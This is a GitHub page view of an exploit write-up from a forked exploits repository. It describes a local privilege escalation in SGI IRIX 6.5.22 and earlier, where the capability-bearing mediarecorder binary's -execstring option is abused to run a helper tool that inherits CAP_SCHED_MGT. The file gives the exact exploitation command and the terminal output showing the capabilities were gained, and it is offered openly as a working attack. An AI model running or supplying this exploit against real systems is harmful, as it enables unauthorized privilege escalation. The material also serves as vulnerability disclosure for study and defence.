forked from hackerhouse-opensource/exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathirix-mediarecorder.txt
55 lines (44 loc) · 2.68 KB
/
irix-mediarecorder.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
SGI IRIX <= 6.5.22 CAP_SCHED_MGT "mediarecorder" privilege escalation
=====================================================================
SGI IRIX capability hijacking example, as shown with my irix-captest.c
it is possible to steal privileges through capabilities in SGI IRIX
systems. "mediaplayer" is installed in SGI IRIX by default with CAP_SCHED_MGT
capabilities via XFS and permits arbitrary command execution through use of an
arg option. This allows any process to obtain privileged scheduling information
on unrelated processes outside of the IRIX permissions model.
A process may obtain the scheduling parameters of itself and any process
sharing the same real user ID [see getuid(2)]. To obtain the scheduling
parameters of an unrelated process, the calling process must have the
CAP_SCHED_MGT capability [see capability].
You will need irix-captest.c to exploit this issue as it will be executed
through "-execstring" command line option. This is described in the man page.
-execstring shellcmdstring
This is a string to execute after any file is written to disk. The
sequence %s within the string will be substituted with name of the
captured file.
To exploit this vulnerability, you must be able to cause mediarecorder to write
to disk either by clicking the record button in X11 or through some other means.
Here is the file listing output of non-setuid binary "mediarecorder" with XFS
capabilities and also the permissions of irix-captest compiled (a tool for requesting
privileges via capabilities). We can see irix-captest has no special privileges.
demos@indiegogo j:0 h:503 (17:28)[ ~/ ] $ ls -alP /usr/sbin/mediarecorder
-rwxr-xr-x 1 root sys 663828 Dec 31 1999 /usr/sbin/mediarecorder [all= CAP_SCHED_MGT+epi]
demos@indiegogo j:0 h:503 (17:28)[ ~/ ] $ ls -alP /usr/demos/hacker/irix-captest
-rwxr-xr-x 1 demos demos 21560 Mar 26 17:12 /usr/demos/hacker/irix-captest []
An example of exploitation of this issue to inherit the CAP_SCHED_MGT capability by the
calling process is shown below. The success indication from set capabilities and new
process capabilities can be seen.
demos@indiegogo j:0 h:503 (17:28)[ ~/ ] $ mediarecorder -execstring "/usr/demos/hacker/irix-captest CAP_SCHED_MGT+eip"
Warning: Cannot allocate colormap entry for "#5ea0b2"
error getting selection color Grey
req effective capabilities 200000000
req permitted capabilities 200000000
req inheritable caps 200000000
set capabilities result 0
effective capabilities 200000000
permitted capabilities 200000000
inheritable capabilities 200000000
demos@indiegogo j:0 h:501 (01:29)[ /usr/demos/ ] $
Happy Hacking!
-- Hacker Fantastic
https://hacker.house